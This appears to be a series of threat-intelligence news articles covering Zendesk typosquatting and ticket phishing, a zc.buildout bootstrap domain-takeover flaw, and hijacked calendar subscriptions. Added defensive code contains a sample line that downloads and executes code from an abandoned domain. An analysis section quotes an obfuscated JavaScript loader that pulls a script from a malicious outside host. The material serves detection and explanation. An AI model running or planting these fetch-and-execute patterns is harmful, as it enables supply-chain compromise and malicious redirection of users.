A sophisticated new cyber offensive has emerged from the “Scattered Lapsus$ Hunters,” a threat collective that has aggressively shifted toward exploiting supply-chain vulnerabilities.
This latest campaign targets Zendesk, a critical customer support platform, effectively turning a trusted business tool into a launchpad for corporate spying.
The attackers have successfully registered over 40 typosquatted domains, including deceptive examples like znedesk[.]com and vpn-zendesk[.]com.
These sites are meticulously designed to mimic legitimate login environments, hosting fraudulent Single Sign-On (SSO) portals that capture credentials from unsuspecting users.
The campaign’s infrastructure reveals a coordinated effort to bypass standard detection protocols. The domains were consistently registered through NiceNic and use Cloudflare-masked nameservers to hide their true hosting origins.
By using these hiding techniques, the actors ensure their phishing pages remain active long enough to harvest significant volumes of high-privilege credentials before defenders can react.
This demonstrates a clear, strategic evolution in their capabilities, allowing them to maintain operational secrecy while targeting widespread platforms used by global enterprises.
The impact of this targeted approach extends far beyond simple credential theft. Reliaquest security analysts identified the malware and noted that the campaign shares distinct domain registry characteristics with the group’s previous attacks on Salesforce in August 2025.
Once attackers bypass the initial authentication layer, they establish a persistent foothold that facilitates lateral movement across the corporate network.
This access allows them to steal highly sensitive customer data, including billing information and government IDs, mirroring the massive data theft seen in their September 2025 breach of Discord.
Weaponizing Support Tickets
The group’s most dangerous tactic involves the direct weaponization of legitimate support tickets to bypass traditional perimeter defenses.
Instead of relying solely on external phishing emails, they submit fraudulent tickets directly into an organization’s Zendesk portal.
These tickets typically masquerade as urgent system administration requests or password reset inquiries, creating a fabricated sense of urgency that compels support agents to act without verification.
Embedded within these tickets are links to the typosquatted domains or malicious payloads designed to compromise the endpoint.
When a help-desk employee interacts with the ticket, they inadvertently trigger the download of Remote Access Trojans (RATs).
This grants the attackers persistent remote control, allowing them to execute commands and monitor activity.
Scattered Lapsus$ Hunters Telegram post (Source – Reliaquest)
The group has brazenly boasted about these complex operations, specifically warning incident response teams to watch their logs closely as they prepare to collect vital customer databases through the upcoming 2026 holiday season.
Hidden vulnerabilities in legacy code often create unseen risks for modern development environments.
One such issue recently surfaced within the Python ecosystem, where outdated bootstrap scripts associated with the zc.buildout tool expose users to domain takeover attacks.
These scripts, designed to automate the installation of package dependencies, contain hardcoded references to external domains that are no longer under the control of the original maintainers.
The core of the problem is a specific behavior in these scripts where they attempt to fetch the deprecated distribute package from python-distribute[.]org.
This domain has been abandoned since 2014 and is currently parked and available for purchase. If a threat actor were to acquire this domain, they could serve malicious payloads that would be automatically downloaded and executed by any developer running the compromised bootstrap script.
Packaging utilities used by the PyPI community in early 2010s (Source – Reversinglabs)
This creates a direct path for supply chain attacks, bypassing standard security checks.
Reversinglabs security analysts identified this vulnerability, noting that it affects several well-known packages, including slapos.core, pypiserver, and tornado.
Although many developers have transitioned to newer packaging standards, these legacy files often persist in repositories.
The vulnerability is not triggered during a standard pip install but typically requires manual execution or invocation through a build process like a Makefile.
Once activated, the script blindly trusts the external source, creating a significant supply chain risk similar to the fsevents incident in the npm registry.
Analyzing the Execution Mechanism
The technical core of this vulnerability lies in the insecure way the bootstrap script handles dependency resolution. The code logic specifically checks for the presence of the distribute package.
Code fetching and executing the distribute setup in the bootstrap.py file (Source – Reversinglabs)
If it is not found, the script initiates a download routine using Python’s built-in urllib libraries. As illustrated in the figure above, the distribute setup script is fetched and executed inside bootstrap.py; the script explicitly requests content from the now-defunct python-distribute[.]org.
Crucially, the response from this URL is passed directly to an exec() function, which runs the code immediately without any integrity checks or signature verification.
Proof-of-concept script that exploits the vulnerability in slapos.core (Source – Reversinglabs)
To validate this vector, researchers crafted a proof-of-concept exploit targeting slapos.core. The PoC works by manipulating command-line arguments to force the script into its vulnerable download path.
The terminal output from running the PoC confirms that the script connects to the external domain, proving that any code hosted there would run with the user’s full privileges.
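A defender's counterpart to the PoC: a small audit routine, added here as an example and not ReversingLabs' code, that flags scripts in a repository which download from the abandoned python-distribute.org host and pass the response to exec(). The two sample scripts are constructed to show the legacy pattern beside a hash-checked download.

```python
"""Audit scripts for the pattern the article describes: code downloaded from the
abandoned python-distribute.org domain and passed to exec() with no verification.
Added example for this article (not ReversingLabs' PoC); the sample scripts are constructed."""
import re

# Host named in the article as abandoned since 2014 and available for purchase.
ABANDONED_HOSTS = ("python-distribute.org",)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# exec applied to a urlopen() response, e.g. exec(urlopen(url).read()) or exec urllib2.urlopen(url)
EXEC_FETCH_RE = re.compile(r"\bexec\b[\s(]*(?:[\w.]+\.)?urlopen\s*\(")
FETCH_RE = re.compile(r"\burlopen\s*\(")
EXEC_RE = re.compile(r"\bexec\b")

def _is_abandoned(host: str) -> bool:
    return any(host == a or host.endswith("." + a) for a in ABANDONED_HOSTS)

def audit_script(text: str) -> dict:
    """Rate one script from the hosts it fetches and whether it executes fetched code."""
    hosts = sorted({m.group(1).lower() for m in URL_RE.finditer(text)})
    abandoned = [h for h in hosts if _is_abandoned(h)]
    # Direct exec(urlopen(...)) is conclusive; fetch and exec in the same file is a weaker signal.
    execs_remote = bool(EXEC_FETCH_RE.search(text)) or (
        bool(FETCH_RE.search(text)) and bool(EXEC_RE.search(text)))
    if abandoned and execs_remote:
        risk = "high"    # the zc.buildout bootstrap behaviour described in the article
    elif abandoned or execs_remote:
        risk = "medium"
    else:
        risk = "none"
    return {"hosts": hosts, "abandoned_hosts": abandoned, "execs_remote": execs_remote, "risk": risk}

# Constructed sample modelled on the legacy bootstrap logic (not the real bootstrap.py).
LEGACY_SAMPLE = '''
from urllib.request import urlopen
try:
    import distribute
except ImportError:
    exec(urlopen("http://python-distribute.org/distribute_setup.py").read())
'''

# Constructed sample that downloads from a pinned URL and checks a hash before using the bytes.
SAFE_SAMPLE = '''
from urllib.request import urlopen
import hashlib
data = urlopen("https://files.pythonhosted.org/PLACEHOLDER/package.tar.gz").read()
if hashlib.sha256(data).hexdigest() != "<expected-sha256-placeholder>":
    raise SystemExit("checksum mismatch")
'''
```

Running audit_script over every bootstrap*.py and Makefile in a checkout is enough to find the lingering scripts the article describes, since the vulnerable path is only reached when those files are invoked directly.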
Digital calendars have become indispensable tools for managing personal and professional schedules. Users frequently subscribe to external calendars for public holidays, sports schedules, or community events to keep their agendas up to date.
While these subscriptions offer convenience, they create a persistent connection between a user’s device and an external server.
If the domain hosting the calendar is abandoned and subsequently expires, it opens a dangerous vulnerability.
Cybercriminals can re-register these expired domains, effectively hijacking the trust established by the original subscription.
The attack vector is particularly insidious because it requires no new action from the victim. The user’s device continues to perform background synchronization requests to the now-malicious domain.
Attackers can then push diverse threats directly into the calendar interface, ranging from scareware that mimics system security alerts to phishing links disguised as exclusive offers.
This method bypasses traditional email filters, leveraging the implicit trust users place in their personal planning tools to deliver malicious payloads.
Bitsight security analysts identified this emerging threat landscape after investigating a single suspicious domain distributing holiday events.
Their deep dive revealed a sprawling network of over 390 abandoned domains that were actively receiving synchronization requests.
Further analysis indicated that these domains were communicating with approximately 4 million unique IP addresses daily, primarily from iOS and macOS devices.
Infection and redirection chain (Source – Bitsight)
This massive scale highlights how a simple lapsed domain registration can expose millions of users to potential compromise without their knowledge.
Technical Breakdown of the Synchronization Traffic
The investigation uncovered specific technical patterns that facilitate this exploitation. The traffic is characterized by HTTP requests where the Accept header signals the device’s readiness to parse calendar files.
Operational overview and potential risks (Source – Bitsight)
The User-Agent string, which carries the dataaccessd daemon identifier, explicitly identifies the source as the iOS Calendar system, confirming the request is a background process rather than a user-initiated browser visit.
GET /[URI]
Host: [Target_Domain]
User-Agent: iOS/17.5.1 (21F90) dataaccessd/1.0
Accept: text/calendar
Researchers categorized the malicious traffic into two main types: Base64-encoded URIs and Webcal query requests.
Calendar .ics file returned by active domain (Source – Bitsight)
As seen in the figure above, the server on an active domain responds with an iCalendar (.ics) file that can contain manipulated event data.
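The request signature above (dataaccessd User-Agent plus Accept: text/calendar) and the two request types the researchers distinguish can be turned into a log filter. This is an added example, not Bitsight's tooling; the access-log layout (combined format with the Accept header appended), the log lines and the exact URI shapes for the two categories are constructed assumptions.

```python
"""Pick out background calendar-subscription fetches in web-server access logs and
sort them into the two request types the article names (Base64-encoded URI, webcal query).
Added example for this article, not Bitsight's tooling; log lines and URI shapes are constructed."""
import base64
import binascii
import re
from urllib.parse import urlsplit

# Combined log format with the request's Accept header appended as a final quoted field (assumed).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<accept>[^"]*)"$')
SYNC_UA_RE = re.compile(r"\bdataaccessd/\d")   # iOS/macOS calendar sync daemon, per the article

def _looks_base64(segment: str) -> bool:
    s = segment.strip("/")
    if len(s) < 8 or not re.fullmatch(r"[A-Za-z0-9+/_=-]+", s):
        return False
    try:
        base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))
    except (binascii.Error, ValueError):
        return False
    return True

def classify_request(uri: str) -> str:
    """'webcal-query' if the URI carries a query string, 'base64-uri' if the path decodes as Base64."""
    parts = urlsplit(uri)
    if parts.query:
        return "webcal-query"
    if _looks_base64(parts.path):
        return "base64-uri"
    return "other"

def find_calendar_sync(lines):
    """Yield only requests carrying the dataaccessd User-Agent and Accept: text/calendar signature."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not SYNC_UA_RE.search(m["ua"]) or "text/calendar" not in m["accept"].lower():
            continue
        yield {"ip": m["ip"], "uri": m["uri"], "kind": classify_request(m["uri"])}

# Constructed log lines; the first two mimic the request shown in the article, the third is a browser.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Dec/2025:08:15:02 +0000] "GET /aG9saWRheXMtdXMuaWNz HTTP/1.1" 200 812 "-" '
    '"iOS/17.5.1 (21F90) dataaccessd/1.0" "text/calendar"',
    '203.0.113.9 - - [01/Dec/2025:08:15:07 +0000] "GET /feed?webcal=holidays-2025 HTTP/1.1" 200 640 "-" '
    '"iOS/17.5.1 (21F90) dataaccessd/1.0" "text/calendar"',
    '198.51.100.7 - - [01/Dec/2025:08:15:09 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0" "text/html"',
]
```

Pointing this at a domain you have just acquired, or at egress logs from a corporate proxy, shows which hosts devices are still polling for calendar data and therefore which lapsed registrations matter.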
Additionally, the underlying infrastructure often employs heavily obfuscated JavaScript to execute deeper compromises.
The code snippet below demonstrates how a payload is dynamically injected into the page’s Document Object Model to initiate a redirection chain:
// _0x407c32 is a script element created earlier by the obfuscated loader
_0x407c32.src = "https://render.linetowaystrue.com/jRQxhz";
// insert the new script tag directly before the currently executing script so it loads immediately
if (document.currentScript) {
    document.currentScript.parentNode.insertBefore(_0x407c32, document.currentScript);
}
This script, once deobfuscated, reveals the mechanism used to load further malicious content, often leading users to the scams.
By understanding these distinct traffic signatures and script behaviors, security professionals can better identify and block this covert attack vector.
The threat actor known as Bloody Wolf has been attributed to a cyber attack campaign that has targeted Kyrgyzstan since at least June 2025 with the goal of delivering NetSupport RAT.
As of October 2025, the activity has expanded to also single out Uzbekistan, Group-IB researchers Amirbek Kurbanov and Volen Kayo said in a report published in collaboration with Ukuk, a state enterprise under the